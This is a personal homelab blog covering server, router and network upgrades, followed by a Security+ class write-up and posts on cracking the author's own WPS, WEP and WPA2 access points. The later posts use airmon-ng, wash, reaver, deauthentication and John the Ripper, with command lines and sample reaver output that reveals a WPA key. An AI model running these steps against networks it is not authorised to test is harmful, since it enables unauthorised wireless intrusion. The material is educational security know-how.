Two Years

A lot has changed since I last posted here.

Back then I was running the server on a 4 core with 8 GB RAM, and the network relied on an off-the-shelf SOHO router.

Since then my network has gone through a number of changes:

The main server was upgraded to a dual CPU 6 core Xeon with 128 GB RAM. I made the switch last year around this time to ZFS as my primary storage file system and won't ever look back at mdadm.

I had gone through and made a ‘compile cluster’ of three Gen 1 Raspberry Pis running Gentoo; these ran relatively well, but I never found a use for them outside of running AI battles of Freeciv.

The above compile cluster was recently returned from the dead with a new batch of Gen 3 Pis, all running 64 bit kernels. Two sit headless on a shelf operating my RADIUS, DNS and local NTP services; the third is my current workstation and their shared portage repo. I also run Gentoo in a VM on the server, ready to cross compile as needed.

The SOHO router started to overheat and shut down, in the middle of a week I was working from home. I had just recently gotten the new server online and still had the ‘bones’ of the old one. Since then I have run a few roll-your-own router distros:

4 core 8GB:
IPcop
*pfSense wouldn't boot
IPFire, the longest and most stable for this run, ran for more than a year without problems.

I also tested switching from my tried and true KVM to ESX, as school would provide it for a year. After a month I changed back; ESX seemed slow on my hardware for all my Linux machines but seemed much more optimized for Windows, too bad I don't run Windows.. I did however get Mac OS X to install.

Around six months or so ago, my wife's father happened on a rack system that was getting tossed; the gentleman who ran it passed away and his wife knew nothing about it and just wanted it gone. He asked if I wanted it.

From that I acquired:
42U rack
PowerConnect 5448 48+4 port switch
Supermicro ‘NAS’ server, 4 core Xeon with 8 GB RAM (upgraded to 32 GB) with 16 2 TB drives
i5 with 16 GB RAM
Dual core AMD, can't remember the RAM as I haven't used it.

Since then I racked my dual Xeon and the router. After having issues with the 4 core router, I decided to upgrade to the i5 for a router, as when I went to the ‘roll your own’ I started down the squid (AV, cache), snort, etc. route and it eats a lot of RAM if you let it.

i5 16GB:
IPFire again, a long run until a friend at work showed me..
PFsense, which would run for a few weeks then suddenly lose WAN/route and I couldn't get it back without reinstalling; this led to going back to..
IPFire, around this time 114 was out and both the installer and upgrader had issues, so I decided to check out..
OPNsense, and have run it ever since.

Everything racked from top down:

Switch
Dual Xeon
Router
SPACE
Supermicro NAS (on the bottom)

Network topology changed as well; given that with the ‘roll your own’ distros I can have completely separate networks, I have for now mainly kept with the IPFire schema:

LAN, for everything wired
Wireless, self-explanatory. I have three access points in the house now: the original 1750AC and a gifted 1900AC, both running as access points with WPA-Enterprise, using the Pi's RADIUS for auth, then an old 600n for legacy WPA2 with a direct line to the internet and nothing else.
Excom, servers and such

LAN can access anything on any of the three networks, but both Wireless and Excom(municated) can only talk to the internet and themselves.

For now I will leave this as my update.

Server Migration and Wireless Fun

Having moved, the server and the entire infrastructure had to be moved and adapted to the new home.

A day before we officially moved, I shut down the server and took it to its new home. Having had internet service set up the week prior, I connected the primary router, which had held fast the settings I had set up, connected the server, and things worked. I hit the WAN IP, I saw the server; all I needed to do was update DNS and I was golden.

The new house, unlike the old, seems to have more of an issue with Wi-Fi connectivity: I have a 1750AC router with 12 dB antennas in the basement with the server, same as the old house, but on the main floor the signal is now half what it used to be.

Nice thing is this house came pre-wired with Ethernet in nearly every room, including what the previous owners turned from a closet into a hideable computer/work desk area. This allowed me to pipe from the basement router to a converted router, now an access point, on the main floor, also supplying a hub from the single wall jack for whatever I want to hard line.

Now I only need to put one on the third floor, as it's the same as with the first two: signal on the third is strained at best.

Time will tell how many access points I end up needing; it's been too cold to try sitting out on the back deck with a PC/laptop.

Attacking WPS

This is a write-up I did for my Security+ class on attacking WPS on newer wireless routers. If you do anything in this tutorial I would suggest using your own equipment, as I don't condone hacking 😉


Basis of cracking a WPS-enabled router:

Start monitor mode on the wireless card:

sudo airmon-ng start wlan0

This creates a monitoring interface called ‘mon0’, needed for later.

Now to scan for WPS-enabled routers we need a program called wash; this comes with the WPS cracking suite named reaver from version 1.4 and up.

sudo wash -i mon0

This may give you the ‘[!] Found packet with bad FCS, skipping…’ error; to ignore these, execute the command above with -C, as in:

sudo wash -i mon0 -C

The -i is for interface; here we use mon0.

This will in turn show you all the WPS-enabled routers: their BSSID (MAC), SSID (name), channel, RSSI (signal strength), WPS version and WPS locked.

I have yet to run into any version above 1.0, and never one that was locked.

It looks like this:

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:21:29:CA:DF:A0 11 -34 1.0 No Hack ME

Once we have this information we can move on to cracking the access point through WPS; jot down the BSSID (MAC).

Now we start with reaver:

sudo reaver -i mon1 -b 00:21:29:CA:DF:A0 -vv

Here again we use -i for the interface, the monitor interface from above; the -b is for BSSID, and we place the MAC there so reaver knows what to attack; the -vv is very verbose, it tells us EVERYTHING it's doing.

At this point reaver will begin to guess PINs against it.

Now before we go further I will explain how reaver ‘guesses’ the PIN. A flaw in the WPS design is that the PIN can be broken into two pieces; the key is eight digits, we'll say 12345670.

The first four can be guessed against the router separately, then the second half, thereby taking one hundred thousand guesses down to ten thousand for the first half.

The second half is actually only three digits and a checksum digit on the end, so the second half only needs one thousand guesses, as it will calculate the checksum automagically. Now some routers will time out after so many guesses, sadly not a well known vendor *CoughLINKSYScough*.
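
The checksum digit and the split described above, as an added example that is not part of the original write-up: it applies the mod-10 checksum rule from the WPS specification to the text's sample PIN 12345670 and works out the guess counts for each strategy, which is why turning WPS off (or at least enforcing lockout) is the mitigation.

```python
# Added example, not from the original write-up: the WPS PIN checksum rule
# from the WPS specification and the worst-case guess counts behind the
# "first half, then second half" split explained above.

def wps_checksum(first_seven: str) -> int:
    """Return the 8th (checksum) digit for the first seven PIN digits."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    acc = 0
    for i, ch in enumerate(first_seven):
        d = int(ch)
        # Digits 1, 3, 5, 7 are weighted 3; digits 2, 4, 6 are weighted 1.
        acc += 3 * d if i % 2 == 0 else d
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is eight digits and its last digit is the right checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def wps_guess_counts() -> dict:
    """Worst-case guesses: eight free digits, seven plus checksum, and the split."""
    eight_digits = 10 ** 8          # if every digit were independent
    seven_plus_checksum = 10 ** 7   # digit 8 is forced by digits 1-7
    first_half = 10 ** 4            # digits 1-4, confirmed on their own
    second_half = 10 ** 3           # digits 5-7; digit 8 is computed
    return {
        "eight_digits": eight_digits,
        "seven_plus_checksum": seven_plus_checksum,
        "split_worst_case": first_half + second_half,
    }


if __name__ == "__main__":
    # The sample PIN from the text above and the all-zero PIN from the output.
    for pin in ("12345670", "00000000", "12345671"):
        print(pin, "valid" if is_valid_wps_pin(pin) else "bad checksum")
    print(wps_guess_counts())
```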

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:21:29:CA:DF:A0
[+] Switching mon1 to channel 11
[+] Associated with 00:21:29:CA:DF:A0 (ESSID: Hack ME)
[+] Trying pin 02075679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK

After guessing for a long time you will eventually get the key, and it will look something like this:

[+] Trying pin 00000000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 128 seconds
[+] WPS PIN: ‘00000000’
[+] WPA PSK: ‘Th1s1550n0Tw0r4hitItsNotFunny’
[+] AP SSID: ‘Hack ME’

First, this was cracked in such a short amount of time because I passed reaver the PIN instead of waiting, but this is what it looks like when it finds it by itself as well.

The WPA PSK is the WPA 1 or 2 password, yes, revealed.

Enjoy!

I Tipped my King in the Wrong Direction..

So after guessing over 1 million passwords in 15 hours I decided to install BackTrack on the desktop and let it whack at it instead.. It has a higher grade CPU, 3.2 dual core compared to 2.0 dual, more memory, 6 GB compared to 4 GB, but the weirdest thing is it's actually doing a lot worse!

Where the laptop was running anywhere from 500 hashes on power saver to 1000+ on performance, the desktop is only doing roughly 333-345 at full boat.

I'll look into it more tomorrow, but hopefully this isn't a trend..

Tipping the Black Hat, with Backtrack 5

Today I played with BackTrack 5 and “penetration tested”, a business-friendly way of saying hacked, my own wireless access points. I set one up as WEP and the other as WPA2 Personal. The WEP was done within about 15 minutes, and it only took that long because I let it grab 30,000+ packets first; once I sat down for the password it was done in seconds. For the WPA I set it up and deauthed my Android cellphone's Wi-Fi connection, making it handshake a few times; the dictionary hack is still running, and should this not work I'll fall back to straight brute force.


EDIT: As of 4 am the next morning the computer had cycled the entire dictionary with no luck. I set it up to use “John the Ripper” to brute-force the password out; this started at 4:38 am. Should it finish or not, I'll post back.